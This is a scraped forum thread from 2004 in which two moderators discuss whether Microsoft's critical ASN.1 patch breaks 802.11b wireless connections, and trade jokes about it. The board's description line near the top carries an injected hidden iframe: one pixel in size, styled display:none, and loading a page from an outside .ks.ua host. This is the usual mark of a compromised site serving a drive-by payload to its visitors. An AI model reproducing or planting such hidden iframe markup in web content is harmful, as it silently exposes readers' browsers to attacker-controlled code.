MS ASN.1 patch and wireless networks.

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

TheParanoidOne
Forum Moderator

MS ASN.1 patch and wireless networks.

Post by TheParanoidOne » 2004-02-14 12:54

MS recently released an ASN.1 patch for Windows with a severity rating of "critical".

Does anyone know if there are currently any issues with this patch and wireless networks, specifically 802.11b? My research so far has come up with nothing.

The reason I ask is that after installing the patch, I couldn't get a wireless network connection. When I removed the patch, I was able to establish a connection again. (Frantic investigation in between those steps omitted ;) )

Is there anyone out there with a wireless network who has installed the patch and can shed any light?

I will do some further investigation, but if it comes to a choice between being open to a "potential" attack or having no network connection at all, I know which one I will choose.
The world is coming to an end. Please log off.

DC++ Guide | Words

Todi
Forum Moderator

Post by Todi » 2004-02-14 17:39

Well, it would protect you against those nasty e-mail viruses going around, wouldn't it? So i guess in Microsofts eyes, it's a successful patch! =D

TheParanoidOne
Forum Moderator

Post by TheParanoidOne » 2004-02-14 18:03

:D

I guess the next patch will disable my power supply, because the safest computer is the one that isn't turned on. :D
The world is coming to an end. Please log off.

DC++ Guide | Words